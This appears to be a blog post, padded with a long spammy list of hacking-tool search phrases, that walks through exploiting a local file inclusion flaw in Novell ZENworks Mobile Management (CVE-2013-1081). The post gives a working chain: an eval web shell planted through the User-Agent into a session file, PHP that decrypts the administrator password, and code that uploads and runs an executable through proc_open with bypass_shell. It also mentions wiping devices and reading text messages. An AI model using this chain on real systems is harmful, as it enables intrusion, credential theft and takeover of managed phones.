Thursday, August 20, 2020

Novell Zenworks MDM: Mobile Device Management For The Masses

I'm pretty sure the reason Novell titled their Mobile Device Management (MDM, yo) under the 'Zenworks' group is because the developers of the product HAD to be in a state of meditation (sleeping) when they were writing the code you will see below.


For some reason the other night I ended up on the Vupen website and saw the following advisory on their page:
Novell ZENworks Mobile Management LFI Remote Code Execution (CVE-2013-1081) [BA+Code]
I took a quick look around and didn't see a public exploit anywhere so after discovering that Novell provides 60 day demos of products, I took a shot at figuring out the bug.
The actual CVE details are as follows:
"Directory traversal vulnerability in MDM.php in Novell ZENworks Mobile Management (ZMM) 2.6.1 and 2.7.0 allows remote attackers to include and execute arbitrary local files via the language parameter."
After setting up a VM (Zenworks MDM 2.6.0) and getting the product installed it looked pretty obvious right away ( 1 request?) where the bug may exist:
POST /DUSAP.php HTTP/1.1
Host: 192.168.20.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.20.133/index.php
Cookie: PHPSESSID=3v5ldq72nvdhsekb2f7gf31p84
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

username=&password=&domain=&language=res%2Flanguages%2FEnglish.php&submit=
Pulling up the source for the "DUSAP.php" script the following code path stuck out pretty bad:
<?php
session_start();

$UserName = $_REQUEST['username'];
$Domain = $_REQUEST['domain'];
$Password = $_REQUEST['password'];
$Language = $_REQUEST['language'];
$DeviceID = '';

if ($Language !== ''  &&  $Language != $_SESSION["language"])
{
     //check for validity
     if ((substr($Language, 0, 14) == 'res\\languages\\' || substr($Language, 0, 14) == 'res/languages/') && file_exists($Language))
     {
          $_SESSION["language"] = $Language;
     }
}

if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}

$_SESSION['$DeviceSAKey'] = mdm_AuthenticateUser($UserName, $Domain, $Password, $DeviceID);
In English:

  • Check if the "language" parameter is passed in on the request
  • If the "Language" variable is not empty and if the "language" session value is different from what has been provided, check its value
  • The "validation" routine checks that the "Language" variable starts with "res\languages\" or "res/languages/" and then if the file actually exists in the system
  • If the user has provided a value that meets the above criteria, the session variable "language" is set to the user provided value
  • If the session variable "language" is set, include it into the page
  • Authenticate

So it is possible to include any file from the system as long as the provided path starts with "res/languages" and the file exists. To start off it looked like maybe the IIS log files could be a possible candidate to include, but they are not readable by the user everything is executing under…bummer. The next spot I started looking for was if there was any other session data that could be controlled to include PHP. Example session file at this point looks like this:
$error|s:12:"Login Failed";language|s:25:"res/languages/English.php";$DeviceSAKey|i:0;
The "$error" value is server controlled, the "language" has to be a valid file on the system (cant stuff PHP in it), and "$DeviceSAKey" appears to be related to authentication. Next step I started searching through the code for spots where the "$_SESSION" is manipulated hoping to find some session variables that get set outside of logging in. I ran the following to get a better idea of places to start looking:
egrep -R '\$_SESSION\[.*\] =' ./
This pulled up a ton of results, including the following:
 /desktop/download.php:$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
 Taking a look at the "download.php" file the following was observed:

<?php
session_start();
if (isset($_SESSION["language"]))
{
     require_once( $_SESSION["language"]);
} else
{
     require_once( 'res\languages\English.php' );
}
$filedata = $_SESSION['filedata'];
$filename = $_SESSION['filename'];
$usersakey = $_SESSION['UserSAKey'];

$_SESSION['user_agent'] = $_SERVER['HTTP_USER_AGENT'];
$active_user_agent = strtolower($_SESSION['user_agent']);

$ext = substr(strrchr($filename, '.'), 1);

if (isset($_SESSION['$DeviceSAKey']) && $_SESSION['$DeviceSAKey']  > 0)
{

} else
{
     $_SESSION['$error'] = LOGIN_FAILED_TEXT;
     header('Location: index.php');

}
The first highlighted part sets a new session variable "user_agent" to whatever our browser is sending, good so far.... The next highlighted section checks our session for "DeviceSAKey" which is used to check that the requester is authenticated in the system, in this case we are not so this fails and we are redirected to the login page ("index.php"). Because the server stores our session value before checking authentication (whoops) we can use this to store our payload to be included :)


This will create a session file named "sess_payload" that we can include, the file contains the following:
 user_agent|s:34:"<?php echo(eval($_GET['cmd'])); ?>";$error|s:12:"Login Failed";
 Now, I'm sure if you are paying attention you'd say "wait, why don't you just use exec/passthru/system", well the application installs and configures IIS to use a "guest" account for executing everything – no execute permissions for system stuff (cmd.exe,etc) :(. It is possible to get around this and gain system execution, but I decided to first see what other options are available. Looking at the database, the administrator credentials are "encrypted", but I kept seeing a function being used in PHP when trying to figure out how they were "encrypted": mdm_DecryptData(). No password or anything is provided when calling the fuction, so it can be assumed it is magic:
return mdm_DecryptData($result[0]['Password']); 
Ends up it is magic – so I sent the following PHP to be executed on the server -
$pass=mdm_ExecuteSQLQuery("SELECT Password FROM Administrators where AdministratorSAKey = 1",array(),false,-1,"","","",QUERY_TYPE_SELECT);
echo $pass[0]["UserName"].":".mdm_DecryptData($pass[0]["Password"]);
 


Now that the password is available, you can log into the admin panel and do wonderful things like deploy policy to mobile devices (CA + proxy settings :)), wipe devices, pull text messages, etc….

This functionality has been wrapped up into a metasploit module that is available on github:

Next up is bypassing the fact we cannot use "exec/system/passthru/etc" to execute system commands. The issue is that all of these commands try and execute whatever is sent via the system "shell", in this case "cmd.exe" which we do not have rights to execute. Lucky for us PHP provides "proc_open", specifically the fact "proc_open" allows us to set the "bypass_shell" option. So knowing this we need to figure out how to get an executable on the server and where we can put it. The where part is easy, the PHP process user has to be able to write to the PHP "temp" directory to write session files, so that is obvious. There are plenty of ways to get a file on the server using PHP, but I chose to use "php://input" with the executable base64'd in the POST body:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
file_put_contents($wdir."cmd.exe",base64_decode(file_get_contents("php://input")));
This bit of PHP will read the HTTP post's body (php://input) , base64 decode its contents, and write it to a file in a location we have specified. This location is relative to where we are executing so it should work no matter what directory the product is installed to.


After we have uploaded the file we can then carry out another request to execute what has been uploaded:
$wdir=getcwd()."\..\..\php\\\\temp\\\\";
$cmd=$wdir."cmd.exe";
$output=array();
$handle=proc_open($cmd,array(1=>array("pipe","w")),$pipes,null,null,array("bypass_shell"=>true));
if(is_resource($handle))
{
     $output=explode("\\n",+stream_get_contents($pipes[1]));
     fclose($pipes[1]);
     proc_close($handle);
}
foreach($output+as &$temp){echo+$temp."\\r\\n";};
The key here is the "bypass_shell" option that is passed to "proc_open". Since all files that are created by the process user in the PHP "temp" directory are created with "all of the things" permissions, we can point "proc_open" at the file we have uploaded and it will run :)

This process was then rolled up into a metasploit module which is available here:


Update: Metasploit modules are now available as part of metasploit.

Continue reading


  1. Hack Website Online Tool
  2. Pentest Tools For Android
  3. Hacking Tools Windows
  4. Hacker Search Tools
  5. Hack Apps
  6. Android Hack Tools Github
  7. Hacker Techniques Tools And Incident Handling
  8. Computer Hacker
  9. How To Make Hacking Tools
  10. Hacking Tools Download
  11. Pentest Tools Framework
  12. Hacker Tools For Pc
  13. Pentest Tools Apk
  14. Tools 4 Hack
  15. Hacking Tools Pc
  16. How To Install Pentest Tools In Ubuntu
  17. Hacking Tools Github
  18. Hacker Tools Linux
  19. Hacking Tools Mac
  20. Hacking Tools And Software
  21. Hack Tools Download
  22. Hacker Tools For Ios
  23. Best Hacking Tools 2020
  24. Hack Tools For Pc
  25. New Hacker Tools
  26. Hackers Toolbox
  27. Hacking Tools Software
  28. Hacker Tools List
  29. Pentest Tools Alternative
  30. Hacker Tools List
  31. Pentest Tools
  32. Hacking Tools For Beginners
  33. Pentest Tools For Windows
  34. Hacker Tools 2019
  35. Hacking Tools For Windows
  36. Hacker Tools
  37. Hacking Tools Pc
  38. Pentest Tools For Android
  39. Easy Hack Tools
  40. Pentest Tools Find Subdomains
  41. Hacker Tools Apk
  42. Hacking Tools For Beginners
  43. Tools 4 Hack
  44. Hack Tools For Ubuntu
  45. Hacking Tools Kit
  46. Growth Hacker Tools
  47. Nsa Hacker Tools
  48. Nsa Hack Tools Download
  49. Hacking Tools For Windows Free Download
  50. Game Hacking
  51. Hacker Tools For Mac
  52. Hacking Tools Software
  53. Nsa Hacker Tools
  54. Tools For Hacker
  55. Hacker Tools Free Download
  56. Hacking Tools Windows
  57. Nsa Hack Tools
  58. Pentest Tools Tcp Port Scanner
  59. Hacking Tools For Games
  60. Pentest Tools Port Scanner
  61. Ethical Hacker Tools
  62. Hacker Tools Hardware
  63. Github Hacking Tools
  64. Hacking Tools For Beginners
  65. Computer Hacker
  66. Kik Hack Tools
  67. Hacker Tools Mac
  68. Hacker Tools Software
  69. Hack Tools Pc
  70. Pentest Tools For Windows
  71. Nsa Hack Tools Download
  72. Hacker Tools Hardware
  73. Pentest Tools Bluekeep
  74. Hak5 Tools
  75. Hacker Tools Online
  76. Hack Tools For Mac
  77. Nsa Hack Tools Download
  78. Best Pentesting Tools 2018
  79. Hacker Tools Free
  80. Pentest Tools For Windows
  81. Usb Pentest Tools
  82. Hak5 Tools
  83. Ethical Hacker Tools
  84. Hacking Tools Github
  85. Pentest Tools List
  86. Hacking Tools Name
  87. Pentest Tools Review
  88. Pentest Tools For Mac
  89. Pentest Tools Framework
  90. Pentest Tools Apk
  91. Hacking Tools Pc
  92. Hack Rom Tools
  93. Hacking Tools Name
  94. Hacker Techniques Tools And Incident Handling
  95. Hacking Tools Kit
  96. Hacking Apps
  97. Hacker Tools Software
  98. What Is Hacking Tools
  99. New Hacker Tools
  100. Hacking Tools For Windows 7
  101. Hack Tool Apk
  102. Github Hacking Tools
  103. Termux Hacking Tools 2019
  104. Hack Apps
  105. Hack Apps
  106. Pentest Tools Website Vulnerability
  107. Hack Tool Apk
  108. Hacker Tools 2019
  109. Hack Tool Apk No Root
  110. Hacker Tools Github
  111. Pentest Tools Open Source
  112. Pentest Tools Free
  113. Hacking Tools For Kali Linux
  114. Hacker Tools
  115. Tools For Hacker
  116. Hacker Tools Free
  117. Pentest Tools
  118. Hacking Tools For Games
  119. Pentest Tools Find Subdomains
  120. Hack Tools
  121. Pentest Tools For Android
  122. Hacking Tools For Mac
  123. Free Pentest Tools For Windows
  124. Hacker Tools Apk
  125. Hacking Tools For Windows
  126. Hak5 Tools
  127. Hacker Hardware Tools
  128. Hack Tools For Mac
  129. Hacker Search Tools
  130. Free Pentest Tools For Windows
  131. What Are Hacking Tools
  132. Hack Tool Apk
  133. New Hack Tools
  134. Hacks And Tools
  135. Hacking App
  136. Best Hacking Tools 2020
  137. How To Make Hacking Tools
  138. Hacker Tools Linux
  139. Hacking App
  140. Android Hack Tools Github
  141. Hacker Tools Free Download
  142. Pentest Tools Free
  143. Hacking Tools Download
  144. Hacking Tools Github
  145. Underground Hacker Sites
  146. Hacking Tools Windows 10
  147. Hackers Toolbox
  148. Pentest Recon Tools
  149. Nsa Hacker Tools
  150. Pentest Tools List
  151. Hack Tool Apk No Root
  152. Pentest Automation Tools
  153. Ethical Hacker Tools
  154. Pentest Tools Github
  155. Pentest Tools For Android
  156. Hacking Tools Kit
  157. Hack Tools For Windows
  158. Best Pentesting Tools 2018
  159. Tools Used For Hacking
  160. World No 1 Hacker Software
  161. Hack Tools Pc
  162. Hacker Tool Kit
  163. Hack Tool Apk No Root
  164. Pentest Reporting Tools
  165. Hacking Tools Windows 10
  166. What Are Hacking Tools
  167. Pentest Tools Subdomain
  168. Pentest Tools Windows
  169. Hacking App
  170. Growth Hacker Tools
  171. Hack Tools

No comments:

Post a Comment